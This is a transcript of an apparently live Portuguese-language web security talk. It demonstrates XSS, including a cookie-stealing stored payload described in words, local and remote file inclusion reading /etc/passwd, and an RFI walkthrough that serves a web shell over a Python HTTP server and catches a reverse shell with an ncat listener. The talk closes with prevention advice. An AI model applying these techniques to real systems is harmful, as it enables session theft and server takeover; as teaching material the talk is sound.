caso aqui eu quero mostrar um XSS refletido, né? Aqui a gente pode inserir qualquer JavaScript, no caso script. E qualquer coisa aqui, né? Vamos botar um alert. Vamos botar aqui, vamos botar 0, por exemplo. É que ele executa o nosso JavaScript. Aí a pessoa pergunta, né? Qual é essa criticidade, né? A gente tem aqui o JavaScript refletido. Aí eu vou mostrar logo o storage, né? Onde a gente consegue introduzir um script. Esse script, toda vez que a gente acessa aquele determinado URL, ele está armazenado, né? O que é perigoso nesse script aqui é que um atacante pode utilizar desse script para roubar a sessão, cookies, né? Cookies de sessão. Mas não somente isso, o atacante pode fazer dependendo do contexto da aplicação, né? Como eu vou mostrar aqui alguns contextos. No caso aqui eu tenho um XSS armazenado e toda vez que eu acessar essa aplicação ele vai executar meu XSS. Toda vez que eu executar aquilo ele vai executar meu código arbitrário. No caso aqui o armazenado, né? Normalmente ele utiliza aqui um script var image, chama uma nova image e ele pega o site do invasor e ele concatena aqui, no caso, o cookie de quem acessou e manda para o invasor. A gente tem o DOM XSS, né? Quando a gente manipula o DOM ele pode ser no header, no body, no título, no script. Nessas fases aqui, no caso aqui. No caso aqui a gente vai manipular o DOM. Vamos manipular direto na aplicação. Aí a gente vai executar o nosso XSS. No caso aqui, a aplicação está me sacaneando. Deixa eu ver se ele vai executar. Demora muito. No caso aqui, deixa eu parar aqui. O DOM seria isso aqui. O DOM seria manipular isso aqui. Mas o DOM seria manipular isso aqui. No caso, a parte da... como mostrei aqui. No caso, o header, o body, o título. No caso aqui. Esse seria o DOM. DOM XSS, né? Aqui a gente tem alguns payloads de XSS. Eu quero mostrar aqui um vídeo rápido aqui. Que eu trouxe aqui. Mostrando alguma criticidade de XSS aqui. Aqui no caso a gente tem um chat onde ele vai executar um XSS. O usuário final aqui no caso aqui, ao visualizar, é executado o nosso RCE, no caso o Remote Code Execute. Ele vai aqui, ó, vai postar aqui o XSS. Que é uma imagem. O location ele vai mostrar que é um código HTML. Ele vai executar esse código HTML, que é um reverse shell. E aí ao executar, ao mostrar, ele executa a calculadora. No caso não é reverse shell, não, no caso é um RCE. A gente tem também uma outra forma aqui, que o cara fica esperando aqui, ó, levanta um servidorzinho aqui. A gente tem um cross-site script refletido aqui. Eu já tenho um site malicioso aqui,
que ao executar o meu comando JavaScript aqui, ele vai executar esse meu código, porque já tem um Python aqui, só que esse carinha aqui já vai estar esperando um reverse shell. Ele vai mostrar aqui. Ó, vai executar aqui. Vai estar esperando aqui, ó, com socket file, chamando PTY, echo, e chamando a porta 444. E aqui ele vai executar um socket, ele vai chamar o nosso JavaScript. Nosso JavaScript já tem um código, e aí ele vai executar o nosso código, e aí vai chamar o nosso reverse shell. E aí chamou o nosso reverse shell. Aqui eu também fiz, que era um PDF, né? Onde a gente tem um XSS, onde a gente tem uma gestão de código CSS, né? Agora o pessoal não tem muito higienizado muito bem o CSS, que é uma injeção de estilo, né? E aí foi injetado o CSS, onde ele requisitou uma fonte, e no final dessa fonte podia ser injetado o código PHP. E aí ele renderizava o PDF, e na hora que ele renderizava o PDF, a gente podia acessar o cache desse PDF, e esse cache do PDF já renderizava o nosso código PHP. No caso aqui, acharam o XSS, viram que ele renderizava aqui com o PDF, e aí no caso aqui já chamaram o cache da aplicação, já chamando no caso o XSS e o DOM PDF. Aqui eu estou mostrando uma outra forma também, que a gente tem uma imagem que a gente usa o Font, no caso aqui, para a gente inserir um comentário na imagem, e aqui a gente consegue executar a imagem somente com aquele comentário, um XSS somente com aquele comentário na imagem. Aqui a gente tem um file inclusion, né? Que é a falha de file inclusion permite que o atacante mostre o conteúdo de um arquivo, mas dependendo da severidade, essa falha permite que a execução de código no servidor, execução de cross-site script, o XSS, negação de serviço e vazamento de informações. O que quer dizer com isso aí no file description, né? No local file description? Qual é a coisa que eu vejo mais de criticidade, né, no file description? Se você tiver um servidor que você conseguir inserir uma informação nesse servidor que você consiga ler, no caso, você consegue executar pela falha de LFI, você consegue executar código, entre outras aspas. Tipo assim, eu tenho um Apache que eu consiga mandar requisições para esse Apache, eu posso infectar o log desse Apache, e aí se eu conseguir ler o log desse Apache, eu consigo fazer uma injeção de código no log do Apache, por exemplo. Eu vou mostrar aqui só a parte de ler arquivos. Aonde a gente tem um RFI, né? Local file inclusion, né? Não é um RFI, é um local file inclusion. Local file, não é esse. Local privilégio. Para vocês que estão começando aí, quiserem habilitar essas docs aí, quiserem uma ajuda aí, pode chamar aí que a gente... Tranquilo. Deixa eu só achar aqui, deixa eu ver aqui. Deixa eu ver se esse... Então, a gente tem aqui uma aplicação, né? Deixa eu ver se é isso aqui, não é isso não, cara. Deixa eu ver aqui, pera, deixa eu pegar o link aqui.
Pô, tinha copiado aqui o link e tá me sacaneando. Pô, é esse aqui mesmo, cara. Tá, a gente tem aqui um RFI, que é um local file inclusive. A aplicação ela chama uns parâmetros aqui, onde ela lê um arquivo, e se a gente modificar esse arquivo, a gente consegue ler arquivos dos sistemas. etc teste wd. Então aqui a gente consegue ler arquivos do sistema. Então ele é um local file inclusive porque a gente consegue ler arquivos do sistema. E o que seria o Remote File Inclusive, né? Usando a inclusão de arquivos remotos, um servidor que pode fazer um aplicativo web inclusa arquivos remotos. Isso é possível para aplicativos web que inclui dinamicamente arquivos externos ou aplicativos. As possíveis consequências para a segurança do web de um ataque RFI bem sucedido vão desde a divulgação de informações confidenciais, cross-site scripts, até a execução de código remoto, e com o resultado final, comprometimento total do sistema. Ataques de inclusão de arquivo remoto geralmente ocorrem quando um aplicativo recebe um caminho de um arquivo como entrada para uma página web e não limpa adequadamente. Isso permite que uma URL externa seja fornecida por uma inclusão, né? Uma função de inclusão. No caso aqui a gente tem o nosso código, que ele recebe ele tem um parâmetro vulnerável que recebe um arquivo externo, e esse arquivo externo, no caso aqui, é o nosso código malicioso. Aqui só exemplificando o que seria o RFI, o RCA e o pivot, né? Aqui a gente tem o nosso atacante, que ele normalmente não pode entrar em qualquer porta no firewall, né? Ele só não tem permissão de entrada, normalmente só tem permissão de saída no firewall, e normalmente essa permissão de saída só tem permissão na 80 ou na 443, ela não tem permissão em outras portas, só são essas portas. E aí a gente tem no nosso servidor lá, exposto lá, uma falha de RFI, que o nosso atacante utiliza aqui o nosso Python para levantar um servidor. Esse servidor ele tem uma web shell reversa. A web shell reversa ele tem esse código reverso aqui. No caso aqui, quando subir, ele vai se conectar no Ncat e mandar a nossa shell reversa para o nosso atacante, que o nosso atacante aqui, no caso, já vai estar esperando na porta 80. E aí, como esse servidor aqui, ele não tem permissão de entrada, ele só tem permissão de saída, esse servidor aqui ele pode sair para qualquer lugar, digamos assim, para a porta 80 ou 443. Esse cara aqui fica esperando lá na porta 80 e aí manda o nosso shell lá, nosso RFI, nossa conexão reversa. Esse executou com uma falha de RFI, executa o nosso código, deixa o nosso atacante entrar na nossa rede, e com isso a gente tem o nosso pivot, que é o nosso movimento lateral dentro da nossa rede. Eu vou mostrar aqui na prática. Então aqui a gente tem uma aplicação vulnerável a RFI. A gente tem uma aplicação vulnerável aqui, que ela solicita um arquivo do usuário. Então, é uma aplicação vulnerável. E aí aqui a gente vai injetar o nosso arquivo remoto. No caso aqui, eu vou levantar o meu servidor malicioso. Aqui eu vou levantar meu servidor malicioso com Python, -3, -m, vou chamar o meu módulo http.cv e eu vou levantar a minha porta 9191. Já tenho meu arquivo, só lembrando que eu já tenho meu arquivo malicioso aqui, que é minha web shell, com WSCO. Vou levantar meu arquivo malicioso na porta 991 e vou
conectar lá no meu arquivo malicioso, no caso aqui meu serve. E aí aqui eu vou levantar na porta 91 91. Como ele tem uma execução de código remoto, ele vai lá no meu servidor. Tá de sacanagem. 9191. Bota ali. 9191. Então executou aqui, ó. Chamou meu código aqui, ó. Executou na página. Chamou a minha shell aqui. Eu já vou para minha shell. Já vou aqui no meu network aqui, que eu já sei que eu tenho um reverse shell. E aí já vou chamar minha reverse shell. Já vou melhorar essa shell. Eu não vou ficar sofrendo com uma shell que não tem permissão, não tem nada, né? Então daqui eu já vou. Vamos dar um exit aqui. No caso aqui eu já espero aqui ncat menos nlvp. nlvp. Na minha porta aqui está conectando aqui a 31337. 31337. Fico esperando aqui minha conexão e já chamo o shell aqui. Eu acho que é aqui, bem aqui. Não é aqui. Sacanagem, não é aqui? É aqui. Tá de sacanagem, né? Pois é, né? Tá me sacaneando essa shell. Tá de sacanagem. Ah, tá. Meu IP tá errado aqui. É o 200. Então, chamei minha shell, esperei ali. Pá. E aí eu chamo ela aqui. Aí eu já tô dentro da servidor. Então, fizemos o RFI, um remote file inclusive. Upamos uma shell remota, um web shell, chamamos um reverse shell e estamos dentro do servidor. E aí, como prevenir, né? A injeção requer manter os dados separados de comandos e consultas. A opção preferida é usar a API segura para evitar usar a intérprete inteiramente. Fornecer uma interface parametrizada e migrar para os objetos relacionados em map-to, né, no caso. Mesmo quando parametrizado, os procedimentos armazenados ainda podem introduzir a injeção SQL. A gente está falando aqui mais de SQL nessa primeira parte aqui. Use validação positiva ou whitelist de entrada do lado do servidor. Esta não é uma defesa completa, né? Pois muitos aplicativos exigem caracteres especiais, né? Cuidado com caracteres especiais, né? Para qualquer consulta dinâmica residuais, fuja de caracteres especiais, eu acabei de falar, né? Nota, em estruturas SQL, como nomes de tabelas, nomes de colunas e assim por diante, não pode ser escapados e, portanto, nomes de estruturas fornecidos pelo usuário são perigosos. Esse tipo de problema é comum em softwares de redação de relatórios. Use limit em outros comandos da SQL dentro de consultas para evitar a divulgação de massa. A gente tem uns outros. Nunca esquecer de validar a entrada e saída do usuário. E a saída quando retornada no view, né? Todo input em texto área, mesmo que parâmetros em query strings nas URLs devem ser higienizados. Nunca adicionado diretamente na marcação. Você deve também utilizar headers específicos que farão que o navegador identificar e não validar conteúdo injetado como validado, conteúdo injetado, né, como validado, né? Sanitize todas as entradas dos usuários, defina um rigoroso conjunto de padrões permitidos, sanitize também as saídas que são permitidas na tela, nunca insira a entrada do usuário diretamente no banco de dados. No caso de uma resposta Ajax, defina cabeçalhos
correspondentes ao tipo de resposta que esteja esperando, no caso, né? E adicionar os cabeçalhos de segurança contra XSS, né? O XSS Protect, Mod Block, que ativa a proteção no navegador. O Content Type Options no Sniff, que evita o código JavaScript seja inserido em imagens e atributos e elementos. O Content Security Politic Script C, que no caso é o mais importante, né? Que evita praticamente todas as entradas XSS em potencial, né? Que tá nos meus canais, né? Tá no LinkedIn, no Git, estamos no Discord aí, no grupo que vocês estão aqui presentes. Tô lá no YouTube, depois a gente vai botar lá esse vídeo lá no YouTube. E quanto maior o seu conhecimento, menor o seu ego, né? E quanto maior o seu ego, menor o seu conhecimento. Albert Einstein. E aí, tô aberto aí para perguntas. Eu queria passar uma coisa melhor, enfim, acabou que foi uma coisa corrida, mas tamo junto. Perguntas? Perguntas? Eu não acredito. Fala. Tá ouvindo? Estão me ouvindo? Pessoal, cadê vocês? Estão me ouvindo? Fala alguém alguma coisa aí.